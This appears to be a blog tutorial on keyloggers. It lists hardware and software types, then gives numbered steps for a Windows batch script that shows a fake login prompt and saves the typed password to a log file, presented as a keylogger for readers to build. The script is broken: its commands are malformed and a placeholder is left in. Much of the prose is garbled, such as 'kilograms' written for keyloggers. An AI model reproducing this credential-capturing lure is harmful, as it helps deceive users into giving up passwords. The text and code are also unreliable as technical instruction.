Keyloggers
Keystroke logging, keylogging and capturing is a process of monitoring or recording the
action performed by any user such as monitoring a user using keyboard using
keyloggers. Keyloggers can be either Hardware or software.The major purpose of
using keylogger are monitoring data copied to the keyboard screenshots
captured by the user screen logging by capturing a screenshot at every moment
even when the user just clicked.
There are two types of keylogger
1) Hardware keylogger
2) Software Keylogger
Hardware Keylogger
# PC/BIOS Embedded Keylogger
# Keylogger Keyboard
#
External Keylogger
External Keylogger
# PS/2 Keylogger
# Acoustic Keylogger
# WIFI
Keylogger
# USB keylogger
# Bluetooth Keylogger
# Video
Keylogger
Software Keylogger
# Kernel
Keylogger
# Form Grabbing Based Keylogger
# Hypervisor Based
Keylogger
# Application Keylogger
Software Keylogger
Software key level performs it's function by login
the action in order to Steal information from the target machine. Software
based kilograms are remotely installed, or an attacker may send it to the user
and user can accidentally execute application.
Hardware Keylogger
Hardware key are physical hardwares which are
installed on hardware by physically access the machine to load the software
into BIOS, keyboard hardware such as key grabber. USB physical device need to
be installed inline with the keyboard hardware.
Creating Keylogger with Notepad
Step 1 - first of all, you need to open notepad in your
windows by pressing windows button and R button and then selecting the notepad
from the option.
@echo off
color a
title Login
cls
echo Please enter your Email address and Password
echo
echo
cd
"C:Logs"
Set /P user = username
Set /P Pass = password
echo
Username = "%user%"
Password= "%pass%" >> Log.txt
Start
>> program Here <<
exit
Step 2 - now save this file has Logs.bat on your desktop.
Step 3 -
now create a new folder name logs (Note that keylogger will only work if the
folder name is logs) cut the folder and paste into C: Drive.
Step 4 - Now test your file Log.bat and then after entering the username and
password.
Step 5 - open the folder in c drive and see all
saved key logs there as a text file created there automatically.
That's
it you are done you have successfully created a keylogger in notepad.
Disclaimer
All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.